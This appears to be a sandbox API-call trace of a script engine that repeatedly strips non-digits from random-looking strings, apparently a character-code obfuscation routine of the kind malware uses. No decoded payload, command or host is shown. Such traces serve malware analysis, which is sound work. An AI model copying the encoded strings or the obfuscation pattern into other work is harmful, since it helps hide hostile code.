	[0034.487] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.487] SysStringLen (param_1="fywuvd104scfyvev") returned 0x10
	[0034.487] GetUserDefaultLCID () returned 0x409
	[0034.487] SysStringLen (param_1="") returned 0x0
	[0034.488] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.488] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.488] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.488] SysStringLen (param_1="zydvjbhgc101fsadisu") returned 0x13
	[0034.488] GetUserDefaultLCID () returned 0x409
	[0034.488] SysStringLen (param_1="") returned 0x0
	[0034.489] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.489] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.489] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.490] SysStringLen (param_1="fxezudd108zjhgwcyu") returned 0x12
	[0034.490] GetUserDefaultLCID () returned 0x409
	[0034.490] SysStringLen (param_1="") returned 0x0
	[0034.490] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.490] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.490] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.490] SysStringLen (param_1="aseybeiuw108ijzxwxc") returned 0x13
	[0034.490] GetUserDefaultLCID () returned 0x409
	[0034.490] SysStringLen (param_1="") returned 0x0
	[0034.491] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.491] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.491] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.491] SysStringLen (param_1="zjsbvdue32vwwzdevyt") returned 0x13
	[0034.491] GetUserDefaultLCID () returned 0x409
	[0034.491] SysStringLen (param_1="") returned 0x0
	[0034.492] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.492] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.492] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.492] SysStringLen (param_1="giwsgwcw36htgujywd") returned 0x12
	[0034.492] GetUserDefaultLCID () returned 0x409
	[0034.492] SysStringLen (param_1="") returned 0x0
	[0034.493] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.493] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.493] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.493] SysStringLen (param_1="wzxhfuet115sfufaczz") returned 0x13
	[0034.493] GetUserDefaultLCID () returned 0x409
	[0034.493] SysStringLen (param_1="") returned 0x0
	[0034.494] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.494] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.494] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.494] SysStringLen (param_1="bxuxjgfz118eayfbegu") returned 0x13
	[0034.494] GetUserDefaultLCID () returned 0x409
	[0034.494] SysStringLen (param_1="") returned 0x0
	[0034.495] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.495] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.495] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.495] SysStringLen (param_1="cxhzcvfda97ugbvhaax") returned 0x13
	[0034.495] GetUserDefaultLCID () returned 0x409
	[0034.495] SysStringLen (param_1="") returned 0x0
	[0034.496] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.496] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.496] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.496] SysStringLen (param_1="gadeebuab98xyifyxj") returned 0x12
	[0034.496] GetUserDefaultLCID () returned 0x409
	[0034.496] SysStringLen (param_1="") returned 0x0
	[0034.497] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.497] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.497] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.497] SysStringLen (param_1="hxwcxcucv106xjutwbcjf") returned 0x15
	[0034.498] GetUserDefaultLCID () returned 0x409
	[0034.498] SysStringLen (param_1="") returned 0x0
	[0034.498] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.498] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.498] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.498] SysStringLen (param_1="biwybz122exvhveczt") returned 0x12
	[0034.498] GetUserDefaultLCID () returned 0x409
	[0034.499] SysStringLen (param_1="") returned 0x0
	[0034.499] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.499] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.499] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.499] SysStringLen (param_1="ccgibu118zzsxiz") returned 0xf
	[0034.499] GetUserDefaultLCID () returned 0x409
	[0034.500] SysStringLen (param_1="") returned 0x0
	[0034.500] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.500] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.500] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.500] SysStringLen (param_1="zgxeeaeie118sjdcjvitg") returned 0x15
	[0034.500] GetUserDefaultLCID () returned 0x409
	[0034.501] SysStringLen (param_1="") returned 0x0
	[0034.501] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.501] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.501] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.501] SysStringLen (param_1="ufwydcuig32sydtevs") returned 0x12
	[0034.501] GetUserDefaultLCID () returned 0x409
	[0034.501] SysStringLen (param_1="") returned 0x0
	[0034.501] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.502] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.502] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.502] SysStringLen (param_1="tytvavj61ahtewzt") returned 0x10
	[0034.502] GetUserDefaultLCID () returned 0x409
	[0034.502] SysStringLen (param_1="") returned 0x0
	[0034.502] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.502] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.502] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.502] SysStringLen (param_1="ixeugtt32vztdscgz") returned 0x11
	[0034.502] GetUserDefaultLCID () returned 0x409
	[0034.502] SysStringLen (param_1="") returned 0x0
	[0034.502] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.503] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.503] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.503] SysStringLen (param_1="fcjetca78hxuvzys") returned 0x10
	[0034.503] GetUserDefaultLCID () returned 0x409
	[0034.503] SysStringLen (param_1="") returned 0x0
	[0034.503] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.503] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.503] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.503] SysStringLen (param_1="xdeygy101zwysucz") returned 0x10
	[0034.503] GetUserDefaultLCID () returned 0x409
	[0034.503] SysStringLen (param_1="") returned 0x0
	[0034.503] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.504] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.504] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.504] SysStringLen (param_1="twwgaahb119uzyuedgvy") returned 0x14
	[0034.504] GetUserDefaultLCID () returned 0x409
	[0034.504] SysStringLen (param_1="") returned 0x0
	[0034.504] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.504] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.504] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.504] SysStringLen (param_1="zwuvyxzwt45csbgcx") returned 0x11
	[0034.504] GetUserDefaultLCID () returned 0x409
	[0034.504] SysStringLen (param_1="") returned 0x0
	[0034.505] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.505] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.505] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.505] SysStringLen (param_1="iuwydyuv79hvtbswcx") returned 0x12
	[0034.505] GetUserDefaultLCID () returned 0x409
	[0034.505] SysStringLen (param_1="") returned 0x0
	[0034.505] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.505] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.505] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.505] SysStringLen (param_1="xxbiee98xwbvjhizd") returned 0x11
	[0034.505] GetUserDefaultLCID () returned 0x409
	[0034.505] SysStringLen (param_1="") returned 0x0
	[0034.506] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.506] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.506] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.506] SysStringLen (param_1="zdavbdvwa106gcyaxgtvw") returned 0x15
	[0034.506] GetUserDefaultLCID () returned 0x409
	[0034.506] SysStringLen (param_1="") returned 0x0
	[0034.507] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.507] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.507] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.507] SysStringLen (param_1="bifxfcwgd101bjfahvbv") returned 0x14
	[0034.508] GetUserDefaultLCID () returned 0x409
	[0034.508] SysStringLen (param_1="") returned 0x0
	[0034.508] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.508] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.508] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.508] SysStringLen (param_1="xubuvu99acfcvfth") returned 0x10
	[0034.508] GetUserDefaultLCID () returned 0x409
	[0034.508] SysStringLen (param_1="") returned 0x0
	[0034.508] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.508] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.508] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.508] SysStringLen (param_1="aijusw116zbussbt") returned 0x10
	[0034.508] GetUserDefaultLCID () returned 0x409
	[0034.509] SysStringLen (param_1="") returned 0x0
	[0034.509] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.509] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.509] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.509] SysStringLen (param_1="xcjxch32ytgawj") returned 0xe
	[0034.509] GetUserDefaultLCID () returned 0x409
	[0034.509] SysStringLen (param_1="") returned 0x0
	[0034.509] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.509] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.509] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.509] SysStringLen (param_1="avafxddte45bxcidabyt") returned 0x14
	[0034.510] GetUserDefaultLCID () returned 0x409
	[0034.510] SysStringLen (param_1="") returned 0x0
	[0034.510] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.510] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.510] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.510] SysStringLen (param_1="tdtysacf67svwvafeyc") returned 0x13
	[0034.510] GetUserDefaultLCID () returned 0x409
	[0034.510] SysStringLen (param_1="") returned 0x0
	[0034.510] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.510] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.510] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.510] SysStringLen (param_1="ifjvxwvd111gsbhuu") returned 0x11
	[0034.510] GetUserDefaultLCID () returned 0x409
	[0034.510] SysStringLen (param_1="") returned 0x0
	[0034.511] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.511] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.511] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.511] SysStringLen (param_1="wzuxsg109jwuysxz") returned 0x10
	[0034.511] GetUserDefaultLCID () returned 0x409
	[0034.511] SysStringLen (param_1="") returned 0x0
	[0034.511] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.511] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.511] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.511] SysStringLen (param_1="zchstzg79jtsxugjhb") returned 0x12
	[0034.511] GetUserDefaultLCID () returned 0x409
	[0034.511] SysStringLen (param_1="") returned 0x0
	[0034.512] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.512] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.512] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.512] SysStringLen (param_1="zxyjydy98vsxbhjjby") returned 0x12
	[0034.512] GetUserDefaultLCID () returned 0x409
	[0034.512] SysStringLen (param_1="") returned 0x0
	[0034.512] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.512] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.512] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.512] SysStringLen (param_1="yciehdx106yaeyua") returned 0x10
	[0034.512] GetUserDefaultLCID () returned 0x409
	[0034.512] SysStringLen (param_1="") returned 0x0
	[0034.513] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.513] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.513] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.513] SysStringLen (param_1="icwjtfy101cvgebicb") returned 0x12
	[0034.513] GetUserDefaultLCID () returned 0x409
	[0034.513] SysStringLen (param_1="") returned 0x0
	[0034.513] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.513] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.513] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.513] SysStringLen (param_1="cztyfz99caxitzxhd") returned 0x11
	[0034.514] GetUserDefaultLCID () returned 0x409
	[0034.514] SysStringLen (param_1="") returned 0x0
	[0034.514] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.514] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.514] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.514] SysStringLen (param_1="jaabedbvx116afwzfefhc") returned 0x15
	[0034.514] GetUserDefaultLCID () returned 0x409
	[0034.514] SysStringLen (param_1="") returned 0x0
	[0034.514] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.514] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.514] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.514] SysStringLen (param_1="cixxjjuh32ichtxbgba") returned 0x13
	[0034.514] GetUserDefaultLCID () returned 0x409
	[0034.514] SysStringLen (param_1="") returned 0x0
	[0034.515] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.515] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.515] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.515] SysStringLen (param_1="abdhxiz77eztuishuh") returned 0x12
	[0034.515] GetUserDefaultLCID () returned 0x409
	[0034.515] SysStringLen (param_1="") returned 0x0
	[0034.515] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.515] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.515] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.515] SysStringLen (param_1="uyagsze115wbxtzuy") returned 0x11
	[0034.515] GetUserDefaultLCID () returned 0x409
	[0034.515] SysStringLen (param_1="") returned 0x0
	[0034.516] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.516] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.516] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.516] SysStringLen (param_1="igihzcbi120fjcuey") returned 0x11
	[0034.516] GetUserDefaultLCID () returned 0x409
	[0034.516] SysStringLen (param_1="") returned 0x0
	[0034.516] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.516] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.516] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.516] SysStringLen (param_1="hgizfabzs109yjgfyhhuj") returned 0x15
	[0034.516] GetUserDefaultLCID () returned 0x409
	[0034.516] SysStringLen (param_1="") returned 0x0
	[0034.517] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.517] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.517] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.517] SysStringLen (param_1="hzchdtzig108fhyatxvcd") returned 0x15
	[0034.517] GetUserDefaultLCID () returned 0x409
	[0034.517] SysStringLen (param_1="") returned 0x0
	[0034.517] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.517] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.517] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.517] SysStringLen (param_1="ejabcwgz50adahxz") returned 0x10
	[0034.517] GetUserDefaultLCID () returned 0x409
	[0034.517] SysStringLen (param_1="") returned 0x0
	[0034.517] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.517] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.517] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.517] SysStringLen (param_1="iwcafv46zasyywjf") returned 0x10
	[0034.517] GetUserDefaultLCID () returned 0x409
	[0034.518] SysStringLen (param_1="") returned 0x0
	[0034.518] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.518] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.518] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.518] SysStringLen (param_1="etagfjh88udvswc") returned 0xf
	[0034.518] GetUserDefaultLCID () returned 0x409
	[0034.518] SysStringLen (param_1="") returned 0x0
	[0034.518] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.518] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.518] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.518] SysStringLen (param_1="usbyiftyz77ecxwzxfhv") returned 0x14
	[0034.518] GetUserDefaultLCID () returned 0x409
	[0034.518] SysStringLen (param_1="") returned 0x0
	[0034.518] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.518] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.518] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.518] SysStringLen (param_1="zdhscxxj76ugutac") returned 0x10
	[0034.519] GetUserDefaultLCID () returned 0x409
	[0034.519] SysStringLen (param_1="") returned 0x0
	[0034.519] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.519] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.519] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.519] SysStringLen (param_1="ubugbcs72tfxwzavtd") returned 0x12
	[0034.519] GetUserDefaultLCID () returned 0x409
	[0034.519] SysStringLen (param_1="") returned 0x0
	[0034.519] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.519] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.519] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.519] SysStringLen (param_1="dzfztesc84czuwjyecj") returned 0x13
	[0034.519] GetUserDefaultLCID () returned 0x409
	[0034.519] SysStringLen (param_1="") returned 0x0
	[0034.520] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.520] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.520] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.520] SysStringLen (param_1="ujefedbzx84eubixhxfz") returned 0x14
	[0034.520] GetUserDefaultLCID () returned 0x409
	[0034.520] SysStringLen (param_1="") returned 0x0
	[0034.520] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.520] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.520] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.520] SysStringLen (param_1="tazehucd80thjwutjb") returned 0x12
	[0034.520] GetUserDefaultLCID () returned 0x409
	[0034.520] SysStringLen (param_1="") returned 0x0
	[0034.521] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.521] ITypeInfo:LocalInvoke (This=0x1288356a4d8) returned 0x0
	[0034.521] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.521] SysStringLen (param_1="zccyyujg59dzhvfzx") returned 0x11
	[0034.521] GetUserDefaultLCID () returned 0x409
	[0034.521] SysStringLen (param_1="") returned 0x0
	[0034.521] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.521] ITypeInfo:LocalInvoke (This=0x1288356a4d8) 
	[0034.521] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.521] SysStringLen (param_1="dbefig32zfyxccuwf") returned 0x11
	[0034.521] GetUserDefaultLCID () returned 0x409
	[0034.521] SysStringLen (param_1="") returned 0x0
	[0034.521] ITypeInfo:LocalGetIDsOfNames (This=0x1288356a4d8) returned 0x0
	[0034.521] SysStringLen (param_1="[^0-9]") returned 0x6
	[0034.521] SysStringLen (param_1="gueeusg36ffasyuxe") returned 0x11
	[0034.522] GetUserDefaultLCID () returned 0x409
	[0034.522] SysStringLen (param_1="") returned 0x0
	[0034.522] GetUserDefaultLCID () returned 0x409
	[0034.522] SysStringLen (param_1="") returned 0x0
	[0034.522] GetUserDefaultLCID () returned 0x409
	[0034.522] SysStringLen (param_1="") returned 0x0
	[0034.522] GetUserDefaultLCID () returned 0x409
	[0034.522] SysStringLen (param_1="") returned 0x0
	[0034.522] GetUserDefaultLCID () returned 0x409
	[0034.522] SysStringLen (param_1="") returned 0x0
	[0034.522] GetUserDefaultLCID () returned 0x409
	[0034.522] SysStringLen (param_1="") returned 0x0
	[0034.522] GetUserDefaultLCID () returned 0x409
	[0034.522] SysStringLen (param_1="") returned 0x0
	[0034.522] GetUserDefaultLCID () returned 0x409
	[0034.522] SysStringLen (param_1="") returned 0x0
	[0034.523] GetUserDefaultLCID () returned 0x409
	[0034.523] SysStringLen (param_1="") returned 0x0
	[0034.523] GetUserDefaultLCID () returned 0x409
	[0034.523] SysStringLen (param_1="") returned 0x0
	[0034.523] GetUserDefaultLCID () returned 0x409
	[0034.523] SysStringLen (param_1="") returned 0x0
	[0034.523] GetUserDefaultLCID () returned 0x409
	[0034.523] SysStringLen (param_1="") returned 0x0
	[0034.523] GetUserDefaultLCID () returned 0x409
	[0034.523] SysStringLen (param_1="") returned 0x0
	[0034.523] GetUserDefaultLCID () returned 0x409
	[0034.523] SysStringLen (param_1="") returned 0x0
	[0034.523] GetUserDefaultLCID () returned 0x409
	[0034.523] SysStringLen (param_1="") returned 0x0
	[0034.523] GetUserDefaultLCID () returned 0x409
	[0034.523] SysStringLen (param_1="") returned 0x0
	[0034.523] GetUserDefaultLCID () returned 0x409
	[0034.523] SysStringLen (param_1="") returned 0x0
	[0034.524] GetUserDefaultLCID () returned 0x409
	[0034.524] SysStringLen (param_1="") returned 0x0
	[0034.524] GetUserDefaultLCID () returned 0x409
	[0034.524] SysStringLen (param_1="") returned 0x0
	[0034.524] GetUserDefaultLCID () returned 0x409
	[0034.524] SysStringLen (param_1="") returned 0x0
	[0034.524] GetUserDefaultLCID () returned 0x409
	[0034.524] SysStringLen (param_1="") returned 0x0
	[0034.524] GetUserDefaultLCID () returned 0x409
	[0034.524] SysStringLen (param_1="") returned 0x0
	[0034.524] GetUserDefaultLCID () returned 0x409
	[0034.524] SysStringLen (param_1="") returned 0x0
	[0034.524] GetUserDefaultLCID () returned 0x409
	[0034.524] SysStringLen (param_1="") returned 0x0
	[0034.524] GetUserDefaultLCID () returned 0x409
	[0034.524] SysStringLen (param_1="") returned 0x0
	[0034.524] GetUserDefaultLCID () returned 0x409
	[0034.524] SysStringLen (param_1="") returned 0x0
	[0034.524] GetUserDefaultLCID () returned 0x409
	[0034.524] SysStringLen (param_1="") returned 0x0
	[0034.525] GetUserDefaultLCID () returned 0x409
	[0034.525] SysStringLen (param_1="") returned 0x0
	[0034.525] GetUserDefaultLCID () returned 0x409
	[0034.525] SysStringLen (param_1="") returned 0x0
	[0034.525] GetUserDefaultLCID () returned 0x409
	[0034.525] SysStringLen (param_1="") returned 0x0
	[0034.525] GetUserDefaultLCID () returned 0x409
	[0034.525] SysStringLen (param_1="") returned 0x0
	[0034.525] GetUserDefaultLCID () returned 0x409
	[0034.525] SysStringLen (param_1="") returned 0x0
	[0034.525] GetUserDefaultLCID () returned 0x409
	[0034.525] SysStringLen (param_1="") returned 0x0
	[0034.525] GetUserDefaultLCID () returned 0x409
	[0034.525] SysStringLen (param_1="") returned 0x0
	[0034.525] GetUserDefaultLCID () returned 0x409
	[0034.525] SysStringLen (param_1="") returned 0x0
	[0034.525] GetUserDefaultLCID () returned 0x409
	[0034.525] SysStringLen (param_1="") returned 0x0
	[0034.525] GetUserDefaultLCID () returned 0x409
	[0034.525] SysStringLen (param_1="") returned 0x0
	[0034.526] GetUserDefaultLCID () returned 0x409
	[0034.526] SysStringLen (param_1="") returned 0x0
	[0034.526] GetUserDefaultLCID () returned 0x409
	[0034.526] SysStringLen (param_1="") returned 0x0
	[0034.526] GetUserDefaultLCID () returned 0x409
	[0034.526] SysStringLen (param_1="") returned 0x0
	[0034.526] GetUserDefaultLCID () returned 0x409
	[0034.526] SysStringLen (param_1="") returned 0x0
	[0034.526] GetUserDefaultLCID () returned 0x409
	[0034.526] SysStringLen (param_1="") returned 0x0
	[0034.526] GetUserDefaultLCID () returned 0x409
	[0034.526] SysStringLen (param_1="") returned 0x0
	[0034.526] GetUserDefaultLCID () returned 0x409
	[0034.526] SysStringLen (param_1="") returned 0x0
	[0034.526] GetUserDefaultLCID () returned 0x409
	[0034.526] SysStringLen (param_1="") returned 0x0
	[0034.526] GetUserDefaultLCID () returned 0x409
	[0034.526] SysStringLen (param_1="") returned 0x0
	[0034.526] GetUserDefaultLCID () returned 0x409
	[0034.526] SysStringLen (param_1="") returned 0x0
	[0034.527] GetUserDefaultLCID () returned 0x409
	[0034.527] SysStringLen (param_1="") returned 0x0
	[0034.527] GetUserDefaultLCID () returned 0x409
	[0034.527] SysStringLen (param_1="") returned 0x0
	[0034.527] GetUserDefaultLCID () returned 0x409
	[0034.527] SysStringLen (param_1="") returned 0x0
	[0034.527] GetUserDefaultLCID () returned 0x409
	[0034.527] SysStringLen (param_1="") returned 0x0
	[0034.527] GetUserDefaultLCID () returned 0x409
	[0034.527] SysStringLen (param_1="") returned 0x0
	[0034.527] GetUserDefaultLCID () returned 0x409
	[0034.527] SysStringLen (param_1="") returned 0x0
	[0034.527] GetUserDefaultLCID () returned 0x409
	[0034.527] SysStringLen (param_1="") returned 0x0
	[0034.527] GetUserDefaultLCID () returned 0x409
	[0034.527] SysStringLen (param_1="") returned 0x0
	[0034.527] GetUserDefaultLCID () returned 0x409
	[0034.527] SysStringLen (param_1="") returned 0x0
	[0034.527] GetUserDefaultLCID () returned 0x409
	[0034.527] SysStringLen (param_1="") returned 0x0
	[0034.527] GetUserDefaultLCID () returned 0x409
	[0034.527] SysStringLen (param_1="") returned 0x0
	[0034.528] GetUserDefaultLCID () returned 0x409
	[0034.528] SysStringLen (param_1="") returned 0x0
	[0034.528] GetUserDefaultLCID () returned 0x409
	[0034.528] SysStringLen (param_1="") returned 0x0
	[0034.528] GetUserDefaultLCID () returned 0x409
	[0034.528] SysStringLen (param_1="") returned 0x0
	[0034.528] GetUserDefaultLCID () returned 0x409
	[0034.528] SysStringLen (param_1="") returned 0x0
	[0034.528] GetUserDefaultLCID () returned 0x409
	[0034.528] SysStringLen (param_1="") returned 0x0
